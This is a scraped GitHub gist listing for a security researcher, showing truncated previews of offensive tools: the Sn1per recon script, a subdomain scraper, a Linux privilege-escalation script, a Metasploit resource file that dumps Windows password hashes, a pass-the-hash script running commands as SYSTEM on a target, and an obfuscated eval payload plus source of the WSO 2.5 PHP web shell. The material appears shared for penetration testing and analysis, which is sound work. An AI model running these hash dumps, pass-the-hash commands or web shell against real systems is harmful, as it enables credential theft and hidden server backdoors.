Skip to content

Instantly share code, notes, and snippets.

xer0dayz 1N3

Block or report user

Report or block 1N3

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View Sn1per v4.4 (Beta)
#!/bin/bash
# + -- --=[Sn1per by 1N3@CrowdShield
# + -- --=[http://crowdshield.com
#
VER="4.4"
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="/usr/share/sniper/plugins"
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
@1N3
1N3 / crt.sh
Last active Oct 20, 2019
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
View crt.sh
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
@1N3
1N3 / LinuxPrivEsc.sh
Created May 13, 2016
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
View LinuxPrivEsc.sh
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
@1N3
1N3 / metasploit-post-exploitation-script-for-windows.rc
Created Feb 3, 2016
Metasploit Post Exploitation Script For Windows
View metasploit-post-exploitation-script-for-windows.rc
setg SESSION 1
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump
@1N3
1N3 / windows-post-exploitation.sh
Created Feb 3, 2016
A Windows post exploitation shell script
View windows-post-exploitation.sh
#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
View Sn1per-v1.5-report
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://crowdshield.com
@1N3
1N3 / index.js
Created Nov 26, 2015
Remotely Sniffing Browser History via XSS Using HSTS + CSP
View index.js
/**
* @fileoverview This file loads a bunch of HSTS domains and times how long it
* takes for them to be redirected from HTTP to HTTPS. Based on that, it
* decides whether the domain is a previously-noted HSTS domain or not.
* @author yan <yan@mit.edu>
* @license MIT
* @version 0.2.0
*/
// Timing in milliseconds above which a network request probably occurred.
@1N3
1N3 / Sn1per Sample Report
Created Sep 7, 2015
Sn1per Sample Report
View Sn1per Sample Report
This file has been truncated, but you can view the full file.
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://crowdshield.com
+ -- --=[sn1per v1.3 by 1N3
View preg_replace_WSO_2.5.php
This was done by taking the preg_replace() function and creating a new PHP file with the function and arguments and analyzing the results...
<?php
echo preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPU
@1N3
1N3 / wso_2.5_shell.php
Last active Oct 28, 2018
WSO 2.5 Shell
View wso_2.5_shell.php
<?php
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ']))
{
$a1="Fil";
$c1="#d";
$c2="f5";
$color = $c1.$c2;
$bs="esM";
$da="an";
$default_action = $a1.$bs.$da;
You can’t perform that action at this time.